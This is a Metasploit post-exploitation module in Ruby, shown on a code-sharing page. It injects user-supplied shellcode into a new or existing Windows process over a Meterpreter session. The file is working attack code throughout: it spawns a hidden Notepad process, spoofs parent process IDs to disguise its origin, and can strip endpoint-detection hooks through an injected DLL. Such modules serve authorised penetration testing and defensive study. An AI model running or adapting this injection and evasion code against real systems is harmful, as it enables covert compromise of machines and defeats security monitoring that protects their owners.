Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Common
8
  include Msf::Post::Windows::Process
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Windows Manage Memory Shellcode Injection Module',
15
        'Description' => %q{
16
          This module will inject into the memory of a process a specified shellcode.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [ 'phra <https://iwantmore.pizza>' ],
20
        'Platform' => [ 'win' ],
21
        'SessionTypes' => [ 'meterpreter' ],
22
        'Compat' => {
23
          'Meterpreter' => {
24
            'Commands' => %w[
25
              stdapi_sys_config_getenv
26
              stdapi_sys_process_attach
27
              stdapi_sys_process_execute
28
              stdapi_sys_process_thread_create
29
            ]
30
          }
31
        }
32
      )
33
    )
34

35
    register_options(
36
      [
37
        OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
38
        OptInt.new('PID', [false, 'Process Identifier of process to inject the shellcode. (0 = new process)', 0]),
39
        OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)', 0]),
40
        OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', false]),
41
        OptBool.new('INTERACTIVE', [true, 'Interact with the process', false]),
42
        OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),
43
        OptBool.new('AUTOUNHOOK', [true, 'Auto remove EDRs hooks', false]),
44
        OptInt.new('WAIT_UNHOOK', [true, 'Seconds to wait for unhook to be executed', 5]),
45
        OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
46
      ]
47
    )
48
  end
49

50
  # Run Method for when run command is issued
51
  def run
52
    # syinfo is only on meterpreter sessions
53
    print_status("Running module against #{sysinfo['Computer']}") if !sysinfo.nil?
54

55
    # Set variables
56
    shellcode = File.binread(datastore['SHELLCODE'])
57
    pid = datastore['PID']
58
    ppid = datastore['PPID']
59
    bits = datastore['BITS']
60
    p = nil
61
    if bits == '64'
62
      bits = ARCH_X64
63
    else
64
      bits = ARCH_X86
65
    end
66

67
    # prelim check
68
    if (client.arch == ARCH_X86) && (@payload_arch == ARCH_X64)
69
      fail_with(Failure::BadConfig, 'Cannot inject a 64-bit payload into any process on a 32-bit OS')
70
    end
71

72
    if (datastore['PPID'] != 0) && (datastore['PID'] != 0)
73
      print_error('PID and PPID are mutually exclusive')
74
      return false
75
    end
76

77
    # Start Notepad if Required
78
    if pid == 0
79
      if (ppid != 0) && !has_pid?(ppid)
80
        print_error("Process #{ppid} was not found")
81
        return false
82
      elsif ppid != 0
83
        print_status("Spoofing PPID #{ppid}")
84
      end
85

86
      notepad_pathname = get_notepad_pathname(bits, client.sys.config.getenv('windir'), client.arch)
87
      vprint_status("Starting  #{notepad_pathname}")
88
      proc = client.sys.process.execute(notepad_pathname, nil, {
89
        'Hidden' => datastore['HIDDEN'],
90
        'Channelized' => datastore['CHANNELIZED'],
91
        'Interactive' => datastore['INTERACTIVE'],
92
        'ParentPid' => datastore['PPID']
93
      })
94
      print_status("Spawned Notepad process #{proc.pid}")
95
    else
96
      if datastore['CHANNELIZED'] && datastore['PID'] != 0
97
        fail_with(Failure::BadConfig, "It's not possible to retrieve output when injecting existing processes!")
98
      elsif datastore['CHANNELIZED'] && datastore['PPID'] != 0
99
        fail_with(Failure::BadConfig, "It's not possible to retrieve output when using PPID spoofing!")
100
      end
101
      unless has_pid?(pid)
102
        print_error("Process #{pid} was not found")
103
        return false
104
      end
105
      begin
106
        proc = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
107
      rescue Rex::Post::Meterpreter::RequestError => e
108
        print_error(e.to_s)
109
        fail_with(Failure::NoAccess, "Failed to open pid #{pid.to_i}")
110
      end
111
      print_status("Opening existing process #{proc.pid}")
112
    end
113

114
    # Check
115
    if (bits == ARCH_X64) && (client.arch == ARCH_X86)
116
      print_error('You are trying to inject to a x64 process from a x86 version of Meterpreter.')
117
      print_error('Migrate to an x64 process and try again.')
118
      return false
119
    end
120
    if arch_check(bits, proc.pid)
121
      if datastore['AUTOUNHOOK']
122
        print_status('Executing unhook')
123
        print_status("Waiting #{datastore['WAIT_UNHOOK']} seconds for unhook Reflective DLL to be executed...")
124
        unless inject_unhook(proc, bits, datastore['WAIT_UNHOOK'])
125
          fail_with(Failure::BadConfig, 'Unknown target arch; unable to assign unhook dll')
126
        end
127
      end
128
      begin
129
        inject(shellcode, proc)
130
      rescue ::Exception => e
131
        print_error("Failed to inject Payload to #{proc.pid}!")
132
        print_error(e.to_s)
133
      end
134
    else
135
      fail_with(Failure::BadConfig, 'Arch mismatch between shellcode and process!')
136
    end
137
  end
138

139
  def inject(shellcode, proc)
140
    mem = inject_into_process(proc, shellcode)
141
    proc.thread.create(mem, 0)
142
    print_good("Successfully injected payload into process: #{proc.pid}")
143
    if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
144
      print_status('Interacting')
145
      client.console.interact_with_channel(proc.channel)
146
    elsif datastore['CHANNELIZED'] && datastore['PID'] == 0
147
      print_status('Retrieving output')
148
      data = proc.channel.read
149
      print_line(data) if data
150
    end
151
  end
152
end
153

154